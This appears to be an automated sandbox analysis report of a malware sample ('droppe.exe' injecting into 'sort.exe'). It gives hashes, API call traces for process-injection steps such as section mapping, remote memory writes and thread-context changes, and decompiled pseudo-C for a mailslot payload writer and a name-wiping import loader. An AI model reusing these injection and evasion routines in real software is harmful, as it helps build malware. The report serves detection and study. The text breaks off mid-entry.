API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: sort.exe Analysis ID: 67025

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	A8B931811E8A8BDB83E0AFF2E1C6E560
Total matches:	37
Initial Analysis Report:	Open
Initial sample Analysis ID:	67025
Initial sample SHA 256:	05F1BC8B6F82269B0EB8BF91AE796EC45FA481C27934244A4C7177CDF1E6123E
Initial sample name:	droppe.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
